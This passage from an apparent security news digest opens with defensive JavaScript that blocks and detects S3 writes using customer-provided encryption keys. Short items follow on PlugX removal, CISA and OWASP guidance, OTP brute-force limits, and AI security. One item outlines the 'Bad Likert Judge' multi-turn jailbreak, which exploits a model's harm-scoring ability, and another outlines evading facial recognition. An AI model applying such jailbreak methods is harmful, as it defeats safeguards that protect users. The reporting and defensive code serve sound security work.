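// Null:"false" means "this condition key IS present in the request", i.e. SSE-C in use.
function denySseCPolicy(bucket) {
  return {
    Version: "2012-10-17",
    Statement: [{
      Sid: "DenyCustomerProvidedKeys",
      Effect: "Deny",
      Principal: "*",
      Action: "s3:PutObject",
      Resource: `arn:aws:s3:::${bucket}/*`,
      Condition: { Null: { [SSEC_KEY]: "false" } },
    }],
  };
}

// Minimal evaluator for this one statement shape (Action + Resource prefix + Null).
// IAM's real evaluator is far richer; this only illustrates the Null semantics.
function denyApplies(stmt, req) {
  if (stmt.Effect !== "Deny" || stmt.Action !== req.action) return false;
  if (!req.resource.startsWith(stmt.Resource.replace(/\*$/, ""))) return false;
  for (const [key, expected] of Object.entries(stmt.Condition.Null)) {
    const present = key in req.contextKeys;
    // Null:"true" matches when the key is absent; Null:"false" when it is present.
    if ((expected === "false") !== present) return false;
  }
  return true;
}

// Request context keys are derived from headers; SSE-C announces itself with
// x-amz-server-side-encryption-customer-algorithm (normally "AES256").
function contextFromHeaders(headers) {
  const ctx = {};
  const alg = headers["x-amz-server-side-encryption-customer-algorithm"];
  if (alg !== undefined) ctx[SSEC_KEY] = alg;
  return ctx;
}

function isWriteDenied(bucket, key, headers) {
  const [stmt] = denySseCPolicy(bucket).Statement;
  return denyApplies(stmt, {
    action: "s3:PutObject",
    resource: `arn:aws:s3:::${bucket}/${key}`,
    contextKeys: contextFromHeaders(headers),
  });
}

// Detection: S3 data events that applied SSE-C on a write. Field names follow
// CloudTrail's S3 data-event format; the "SSE_C" value is an assumption to verify.
function findSseCWrites(records) {
  return records
    .filter((r) => r.eventSource === "s3.amazonaws.com")
    .filter((r) => r.eventName === "PutObject" || r.eventName === "CopyObject")
    .filter((r) => (r.additionalEventData || {}).SSEApplied === "SSE_C")
    .map((r) => ({ time: r.eventTime, who: r.userIdentity && r.userIdentity.arn,
      bucket: r.requestParameters && r.requestParameters.bucketName,
      key: r.requestParameters && r.requestParameters.key }));
}

// Constructed CloudTrail records (123456789012 is AWS's documentation placeholder account).
const SAMPLE_EVENTS = [
  { eventTime: "2025-01-14T03:12:09Z", eventSource: "s3.amazonaws.com", eventName: "PutObject",
    userIdentity: { arn: "arn:aws:iam::123456789012:user/ci-deploy" },
    requestParameters: { bucketName: BUCKET, key: "reports/q4.csv" },
    additionalEventData: { SSEApplied: "SSE_C" } },
  { eventTime: "2025-01-14T03:12:10Z", eventSource: "s3.amazonaws.com", eventName: "PutObject",
    userIdentity: { arn: "arn:aws:iam::123456789012:role/app-writer" },
    requestParameters: { bucketName: BUCKET, key: "reports/q3.csv" },
    additionalEventData: { SSEApplied: "SSE_KMS" } },
  { eventTime: "2025-01-14T03:12:11Z", eventSource: "s3.amazonaws.com", eventName: "GetObject",
    userIdentity: { arn: "arn:aws:iam::123456789012:role/app-reader" },
    requestParameters: { bucketName: BUCKET, key: "reports/q3.csv" } },
];

function demo() {
  return {
    sseCDenied: isWriteDenied(BUCKET, "reports/q4.csv",
      { "x-amz-server-side-encryption-customer-algorithm": "AES256" }),
    sseKmsAllowed: !isWriteDenied(BUCKET, "reports/q4.csv",
      { "x-amz-server-side-encryption": "aws:kms" }),
    suspiciousWrites: findSseCWrites(SAMPLE_EVENTS).length,
  };
}
```

The deny only stops future SSE-C writes; a key that can already PutObject can still overwrite or delete, so the policy is a backstop for the key hygiene above, not a replacement for it, and bucket versioning is what keeps a pre-attack copy of an object that has been overwritten in place.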
FBI forces Chinese malware to delete itself from thousands of US computers
The People's Republic of China (PRC) government paid the Mustang Panda group to develop a version of PlugX malware used to infect, control, and steal information from victim computers. The malware has been known for years, but many Windows computers were still infected while their owners were unaware.
The FBI learned of a method to remotely remove the malware from a French law enforcement agency, which had gained access to a command-and-control server that could send commands to infected computers. The FBI said it provided notices to Internet service providers that host the IP addresses used by the victims, and that the notices ask each ISP to inform customers of the malware deletion.
The operation was similar to one conducted a year ago on hundreds of infected routers. OFAC also announced sanctions against Sichuan Juxinhe Network Technology Co., a Chinese cybersecurity firm believed to be directly involved with the Salt Typhoon state hacker group.
New LLM jailbreak uses models’ evaluation skills against them
A new jailbreak method for large language models (LLMs) takes advantage of models’ ability to identify and score harmful content in order to trick the models into generating content related to malware, illegal activity, harassment and more.
The “Bad Likert Judge” multi-step jailbreak technique was developed and tested by Palo Alto Networks Unit 42, and was found to increase the success rate of jailbreak attempts by more than 60% when compared with direct single-turn attack attempts. Overall, when tested across 1,440 cases using six different “state-of-the-art” models, the Bad Likert Judge jailbreak method had about a 71.6% average attack success rate across models.
In order to mitigate jailbreaks like Bad Likert Judge, maintainers of LLM applications should apply content filters that evaluate both the inputs and outputs of conversations to block potentially harmful content from being generated. Content filters work in addition to models’ built-in safeguards from training.
When Bad Likert Judge was tested on models with content filters applied, the success rate was reduced by 89.2% on average.
Even modest makeup can thwart facial recognition
While previous efforts, such as CV Dazzle, adversarial patches, and Juggalo makeup, relied on bold, high-contrast modifications to disrupt facial detection, these approaches often suffer from two critical limitations: their theatrical prominence makes them easily recognizable to human observers, and they fail to address modern face detectors trained on robust key-point models.
In contrast, this study demonstrates that effective disruption of facial recognition can be achieved through subtle darkening of high-density key-point regions (e.g., brow lines, nose bridge, and jaw contours) without triggering the visibility issues inherent to overt disguises.
APPSEC, DEVSECOPS, DEV
CISA Issues Cybersecurity Guidance for IT Sector
The Cybersecurity and Infrastructure Security Agency (CISA) has published guideposts for the IT industry to help improve cybersecurity throughout the software development lifecycle.
The guidance, called IT Sector-Specific Goals, or IT SSGs, recommends voluntary cybersecurity steps aligned with Secure by Design principles: identifying and addressing vulnerabilities before product release, and improving incident response and software security.
The IT SSGs’ recommendations include:
Network segmentation and other controls to segregate the software development ecosystem
Instituting regular logging, monitoring and trust reviews on authorization and access across the software development environments
Providing phishing-resistant multifactor authentication in the access of all software development processes within the ecosystem
Establishing security protocols for software used in the development process
Storing sensitive data and credentials in encrypted form rather than in source code
Creation of a software supply chain risk management plan
CISA and FBI Release Updated Guidance on Product Security Bad Practices
All software manufacturers are strongly encouraged to avoid these product security bad practices. The bad practices are divided into three categories.
Product properties, which describe the observable, security-related qualities of a software product.
Security features, which describe the security functionalities that a product supports.
Organizational processes and policies, which describe the actions taken by a software manufacturer to ensure strong transparency in its approach to security.
CISA Releases Microsoft Expanded Cloud Logs Implementation Playbook
CISA released the Microsoft Expanded Cloud Logs Implementation Playbook to help organizations get the most out of Microsoft’s newly introduced logs in Microsoft Purview Audit (Standard). This step-by-step guide enables technical personnel to better detect and defend against advanced intrusion techniques by operationalizing expanded cloud logs.
CISA and US and International Partners Publish Guidance on Priority Considerations in Product Selection for OT Owners and Operators
CISA—along with U.S. and international partners—released joint guidance Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products. As part of CISA’s Secure by Demand series, this guidance focuses on helping customers identify manufacturers dedicated to continuous improvement and achieving a better cost balance, as well as how Operational Technology (OT) owners and operators should integrate secure by design elements into their procurement process.
OWASP Publishes First-Ever Top 10 “Non-Human Identities (NHI) Security Risks”
The Open Worldwide Application Security Project (OWASP) released the first “Non-Human Identities (NHI) Top 10”. NHIs are the identities used to authorize software entities such as applications, APIs, bots, and automated systems to access secured resources.
Improper Offboarding
Secret Leakage
Vulnerable Third-Party NHIs
Insecure Authentication
Overprivileged NHIs
Insecure Cloud Deployment Configurations
Long-Lived Secrets
Environment Isolation
NHI Reuse
Human Use of NHIs
The number of organizations conducting adversarial tests (abuse cases) has doubled year-over-year.
The number of organizations performing software composition analysis (SCA) on code repositories has increased by 67%.
The number of organizations employing research groups to develop new attack methods has grown by 30%.
The number of organizations generating software bills of materials (SBOMs) for deployed software has risen by 22%.
Trends
Secure Innovation: As organizations grapple with the opportunities and risks of AI and machine learning (ML), many are struggling to define and secure this new, evolving attack surface. A key trend observed is a ~30% increase in organizations engaging research groups to develop new attack methods. Additionally, the use of adversarial tests (abuse cases) has more than doubled since the previous report (BSIMM14).
Software Supply Chain Security: With self-attestation requirements for selling software to the U.S. government, organizations are increasingly prioritizing activities that support compliance. For example, there has been a 22% rise in the number of organizations creating SBOMs for deployed software, and a 67% increase in organizations performing software composition analysis (SCA) on code repositories.
Declining Security Awareness Training: In 2008, 100% of organizations in BSIMM1 conducted software security awareness training. However, this rate has steadily declined, and in BSIMM15, only 51.2% of organizations are still providing basic security training to their teams, marking the lowest rate observed to date.
Microsoft eggheads say AI can never be made secure – after testing Redmond's own products
Microsoft brainiacs who probed the security of more than 100 of the software giant's own generative AI products came away with a sobering message: The models amplify existing security risks and create new ones.
The authors, Azure CTO Mark Russinovich among them, argue that with further work the cost of attacking AI systems can be raised – as has already happened for other IT security risks through defense-in-depth tactics and security-by-design principles.
And in that respect it's perhaps all not too surprising – is any non-trivial computer system ever totally utterly secure? Some say yes, some say no.
"We found that larger models were generally better at adhering to user instructions, which is a core capability that makes models more helpful," the authors state. "That’s good news for users, but bad for defenders because the models are more likely to follow malicious instructions."
The authors also advise considering the security implications of a model’s capabilities in the context of its purpose. To understand why, consider that an attack on an LLM designed to help creative writing is unlikely to create an organizational risk, but adversarial action directed against an LLM that summarizes patients’ healthcare histories could produce many unwelcome outcomes.
Research Reveals Security Implications of FIDO2 and Synced Passkeys
The concerns include the potential for remote attacks and the creation of single points of failure in cases where passkey providers might be compromised. Such security challenges have led some organizations, like RSA, to develop solutions using device-bound passkeys as an alternative to synced credentials.
Hikvision Password Reset Brute Forcing
One common pattern in password resets is sending a one-time password to the user to enable them to reset their password. But there is a critical issue that is often overlooked: The page verifying the code MUST implement some basic brute force protection. Otherwise, it tends to be easy to brute force the code, which is often just a five or six-digit number. Of course, this assumes that the code is random!
This has been an issue a few times already. Facebook, for example, suffered from this weakness last year. Only a limited number of attempts should be allowed to implement some brute force protection, and the time the code is valid should be constrained.
In my opinion, for an "average" site, five attempts and 30 minutes seem reasonable.
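An added example, not code from the diary post, of a reset-code verifier that applies the controls described above: a capped number of guesses and a bounded code lifetime, using the post's suggested five attempts and 30 minutes. `ResetOtpStore` and the injectable clock are this example's own; the store is in-memory for illustration.

```python
"""Added example: password-reset OTP verification with brute-force limits."""
import hmac
import secrets
import time
from dataclasses import dataclass

MAX_ATTEMPTS = 5            # the post's suggestion for an "average" site
CODE_TTL_SECONDS = 30 * 60  # 30-minute validity window
CODE_DIGITS = 6             # 5 guesses out of 10^6 codes: ~0.0005% success


@dataclass
class ResetChallenge:
    code: str
    issued_at: float
    failures: int = 0


class ResetOtpStore:
    """In-memory store; a real deployment keeps this server-side (DB/cache)
    and would also throttle how often a user can request a new code."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending: dict[str, ResetChallenge] = {}

    def issue(self, user_id: str) -> str:
        # Cryptographically random, zero-padded to a fixed width.
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[user_id] = ResetChallenge(code, self._clock())
        return code  # delivered out of band (SMS/e-mail), never to the browser

    def verify(self, user_id: str, submitted: str) -> str:
        """Returns 'ok', 'expired', 'locked' or 'invalid'. Every terminal
        outcome deletes the challenge so the same code cannot be retried."""
        challenge = self._pending.get(user_id)
        if challenge is None:
            return "invalid"
        if self._clock() - challenge.issued_at > CODE_TTL_SECONDS:
            del self._pending[user_id]
            return "expired"
        # Constant-time comparison so timing does not leak matching prefixes.
        if hmac.compare_digest(challenge.code.encode(), submitted.encode()):
            del self._pending[user_id]
            return "ok"
        challenge.failures += 1
        if challenge.failures >= MAX_ATTEMPTS:
            del self._pending[user_id]  # code is burned; user must request anew
            return "locked"
        return "invalid"
```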
VENDORS & PLATFORMS
Google Releases Open Source Library for Software Composition Analysis
Google has released OSV-SCALIBR (Software Composition Analysis LIBRary), an open source library for software composition analysis. Released as an open source Go library, the tool is an extensible file system scanner designed to extract information on software inventory and identify vulnerabilities.
OSV-SCALIBR can either be used as a standalone binary (a wrapper around the library), or can be imported into Go projects as a library. The tool supports software composition analysis (SCA) for packages, binaries, and source code.
It can be used to scan OS packages on Linux, Windows, and macOS, and supports artifact and lockfile scanning in several programming languages.
Just as your LLM once again goes off the rails, Cisco, Nvidia are at the door smiling
Nvidia introduced a trio of specialized microservices aimed at stopping your own AI agents from being hijacked by users or spouting inappropriate stuff onto the 'net.
Cisco AI Defense focuses on two main areas: accessing AI applications, and building and running AI applications.
Enterprises in for a shock when they realize power and cooling demands of AI
72 percent of corporate leaders are aware AI models have huge energy requirements, and many are concerned about this, yet only 13 percent monitor the power consumption of the AI systems they have deployed.
The power draw is driven in most cases by reliance on power-hungry GPUs that are crammed into high-performance server systems to tackle model training. By 2027, most corporate leaders will be keeping a close check on energy consumption as a key performance indicator (KPI).
Adding impetus to this is the rise of so-called agentic AI models. These are developed to be capable of taking autonomous actions and solving multi-step problems, and their greater complexity will add to energy woes. For organizations sticking with GPUs, dealing with the heat generated by the power-guzzling hardware is becoming another big issue, with Nvidia's Blackwell products rated at 1,200 W, for example.
In many cases, this will involve more effective cooling systems, with liquid cooling becoming increasingly popular. However, not all facilities will be suitable for outfitting with liquid cooling. While traditional facilities were built around halls with racks of 2-5 kW power density, new builds now have to accommodate much higher. Liquid cooling is essential in racks with greater than 10 kW power density and is desirable in the 5-10 kW range.
There is likely a ceiling to how much density can be raised. At one Equinix site I saw a retrofit project result in rack density increasing from 10 kW to 30 kW per rack.
Technology Architecture Reviews Generate Value From AI Investments
Particularly for AI investments, tech leaders will need to have a full understanding of their data and consider storage requirements, or risk planned AI projects failing as a result. An effective review will assess IT applications, data, integration and infrastructure. Looking at elements in isolation isn’t enough.